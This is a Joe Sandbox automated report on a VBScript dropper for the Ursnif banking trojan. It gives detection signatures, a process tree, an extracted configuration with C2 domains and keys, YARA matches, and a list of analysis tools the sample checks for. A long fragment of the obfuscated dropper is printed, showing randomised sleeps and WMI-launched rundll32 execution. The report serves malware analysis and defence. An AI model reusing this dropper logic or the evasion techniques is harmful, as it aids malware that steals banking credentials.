Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gnAYDP69br2v.vbs

Overview

General Information

Sample Name:gnAYDP69br2v.vbs
Analysis ID:560537
MD5:694a1a5ee37e5c161a37d4166a677850
SHA1:adfdbca254f8f810735cf2224aca1630af762bea
SHA256:0993c606df923ac8f174d7789fb494633c89d99d48747a91b866dc410cbd5814
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Antivirus detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Deletes itself after installation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6536 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 6620 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 6788 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 6772 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "YH51zbw68XXolzw8uQmujXgr7vnasuZcFgH7AJ2kGBzL4PhjIyVzy5MDJsglBibg5h0RNR44WiefAtoK6SAdWueylFfdzQd683oCOk4rKCggPtdTeSl7hrve2I0aDaCBkoeiOxpSRC00pY0DaAjoBH1DxdU5ti0d0lMA4aqyGSJ+NcMQxJbjly/3eM1JgxTeRv8qfeoCn1t6fo9nKZliSXvxzEf8TXf46mNAineKBDDVsAYvylxjeMV9NuQnAN5bCZLiyp7C5x9eiMqtTEAUnFh9cMrGskg6XvfPGY7auFDj9EDMWtYHKhgHVdRDPVkTTSsGy44FUesZ+6Z4Xw7vU9rgofRZORY0rQQe0OFqz4s=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "gX5RILpAQgp3pEaS", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      23.2.rundll32.exe.2ca0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        23.3.rundll32.exe.4638d0f.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          23.2.rundll32.exe.4b694a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            23.2.rundll32.exe.6ffa0000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              23.2.rundll32.exe.4b694a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

                Sigma Overview

                No Sigma rule has matched

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "YH51zbw68XXolzw8uQmujXgr7vnasuZcFgH7AJ2kGBzL4PhjIyVzy5MDJsglBibg5h0RNR44WiefAtoK6SAdWueylFfdzQd683oCOk4rKCggPtdTeSl7hrve2I0aDaCBkoeiOxpSRC00pY0DaAjoBH1DxdU5ti0d0lMA4aqyGSJ+NcMQxJbjly/3eM1JgxTeRv8qfeoCn1t6fo9nKZliSXvxzEf8TXf46mNAineKBDDVsAYvylxjeMV9NuQnAN5bCZLiyp7C5x9eiMqtTEAUnFh9cMrGskg6XvfPGY7auFDj9EDMWtYHKhgHVdRDPVkTTSsGy44FUesZ+6Z4Xw7vU9rgofRZORY0rQQe0OFqz4s=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "gX5RILpAQgp3pEaS", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\melange.yuvAvira: detection malicious, Label: TR/AD.UrsnifDropper.vsbvn
                Source: Binary string: c:\shell\town.Woman\interest\will.pdb source: rundll32.exe, 00000017.00000002.882547399.0000000070017000.00000002.00000001.01000000.0000000C.sdmp, melange.yuv.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7000EEA1 FindFirstFileExW,23_2_7000EEA1

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                E-Banking Fraud

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_6FFA227423_2_6FFA2274
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7000CA4A23_2_7000CA4A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7000376123_2_70003761
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 70002290 appears 34 times
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_6FFA14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,23_2_6FFA14FE
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_6FFA1B4A NtMapViewOfSection,23_2_6FFA1B4A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_6FFA1382 GetProcAddress,NtCreateSection,memset,23_2_6FFA1382
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_6FFA2495 NtQueryVirtualMemory,23_2_6FFA2495
                Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                Source: gnAYDP69br2v.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"
                Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServerJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServerJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
                Source: classification engineClassification label: mal100.troj.evad.winVBS@6/2@0/0
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"
                Source: gnAYDP69br2v.vbsStatic file information: File size 2488066 > 1048576
                Source: Binary string: c:\shell\town.Woman\interest\will.pdb source: rundll32.exe, 00000017.00000002.882547399.0000000070017000.00000002.00000001.01000000.0000000C.sdmp, melange.yuv.0.dr

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)REM feud policy theology irate liven comparator Ralph megavolt televise gift alarm cultivable javelin ovary Rufus craven bevy hunt ugly marrowbone magnetic End WithDim quadrupole: Set quadrupole = CreateObject("WScript.Shell")Dim Ijil: Set Ijil = CreateObject("Scripting.FileSystemObject")If (Ijil.FileExists(SvurK + "adobe.url")) Then' clubhouse turbulent delegate, 5083367 intend academia involution imperishable convulsion fee clandestine springtime stearic tibia condemnatory crook handkerchief orphanage tepid fence teapot ocph("DEBUG: F_LOCKFILE - False")ROpElseWith quadrupole.createShortcut(SvurK + "adobe.url").TargetPath = "https://adobe.com".Save()End Withocph("DEBUG: F_LOCKFILE - True")' salon Coddington fast McBride sunset February croft mannequin acuity purvey vindictive End IfEnd FunctionFunction weHra()ocph("DEBUG: F_RUN - Start")UuH=60000' strontium deoxyribose testicle carpetbagger thulium lye Silas standpoint confirm lavish ragging, raven broadloom collar moral, Mecca standard songbird Harlan earnest exfoliate soupy=40000RandomizeSet BYkLiService = GetObject("winmg" + "mts:Win32_Pro" + "cess")REM spill family towhead honeysuckle alkaloid. 4079355 wholesome usurpation sheath suffer oilmen whimsey emerald Morgan, 4462814 If (InStr(WScript.ScriptName, cStr(58462)) > 0 And sapsucker = 0) ThenChiangWith WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)End Witharchetype471 = "ca" + "lc.e" + "xe"' eft enormous Muzak Thor Polynesia pendant Dempsey contraception phosphide blockade belie clement covariant deadhead debilitate petrochemical amide BYkLiService.create archetype471ocph("DEBUG: F_RUN_T - True")ElseChiangWith WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)End WithUCTw = "rundll32" + " " + SvurK + "melange.yuv" + ",DllRegisterServer":BYkLiService.create UCTwocph("DEBUG: F_RUN_W - True")alLA("-")EMExEnd IfEnd FunctionFunction VuibL()ocph("DEBUG: FS_CLB - Start")' fortunate assonant atrophic absolution estimate lovelorn vegetate, plumb pappy stillwater schoolgirlish on error resume nextDim UuH,soupyREM saloon Pritchard sadden. indolent rancho Semite Harrington inflater stoneware bemadden. Rochester drake800 Shattuck UuH=5000soupy=2000RandomizeWScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)set BYkLi = GetObject("winmgmts:\\.\root\cimv2")' thunderflower niece mountaintop diverse roost putty duel compressible Buchenwald immutable Fomalhaut. 8154240 wont crowd carcass grownup dialectic taught curtain confederate invoke denouement set FtLaZ = BYkLi.InstancesOf("Win32_OperatingSystem")for each hSW in FtLaZaesthetic = hSW.LastBootUpTime' souvenir minuscule committal Havana heartbreak f cure helicopter tung Gorton, backorder Midwest jFE = Mid(aesthetic,1,4) & "-" & Mid(aesthetic,5,2) & "-" & Mid(aesthetic,7,2) & " " & Mid(aesthetic,9,2) & ":" & Mid(aesthetic,11,2) & ":" & Mid(aesthetic,13,2)monologistec = abs(datediff("s",jFE,now))ZuAV = monologistec \ 60REM hut orange copperhead selfadjoint clomp byline approximate t
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_6FFA2263 push ecx; ret 23_2_6FFA2273
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_6FFA2210 push ecx; ret 23_2_6FFA2219
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_700022D6 push ecx; ret 23_2_700022E9
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70001C44 push ecx; ret 23_2_70001C57
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7004C4C0 push ebx; iretd 23_2_7004C4D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7004D302 push edx; ret 23_2_7004D306
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_6FFA1A0A LoadLibraryA,GetProcAddress,23_2_6FFA1A0A
                Source: melange.yuv.0.drStatic PE information: real checksum: 0xab069 should be: 0xb1a89

                Persistence and Installation Behavior

                barindex
                Creates processes via WMI
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\melange.yuvJump to dropped file
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\melange.yuvJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Deletes itself after installation
                Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\gnaydp69br2v.vbsJump to behavior
                Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EMUL.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIECTRL.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: APISPY.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGMON.EXEIK
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCKTOOL.EXE;HQ
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDAQ.EXET
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BEHAVIORDUMPER.EXE@Q
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXE@
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE@
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FORTITRACER.EXE
                Source: wscript.exe, 00000000.00000003.739566081.00000274BF6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXEICAL@
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXEA
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: APISPY.EXE@
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMUL.EXE@.8
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXEJ
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCKTOOL.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NETSNIFFER.EXEK
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PEID.EXE@#Z
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE@
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HOOKANAAPP.EXE@
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXEH
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDAG.EXE:V
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXE@A
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FORTITRACER.EXEA
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE@
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIECTRL.EXE@
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIESVC.EXE
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIESVC.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMUL.EXE.8
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDAG.EXE@:V
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SANDBOXIERPCSS.EXE@V5
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PEID.EXE#Z
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE@J
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HOOKANAAPP.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXET
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
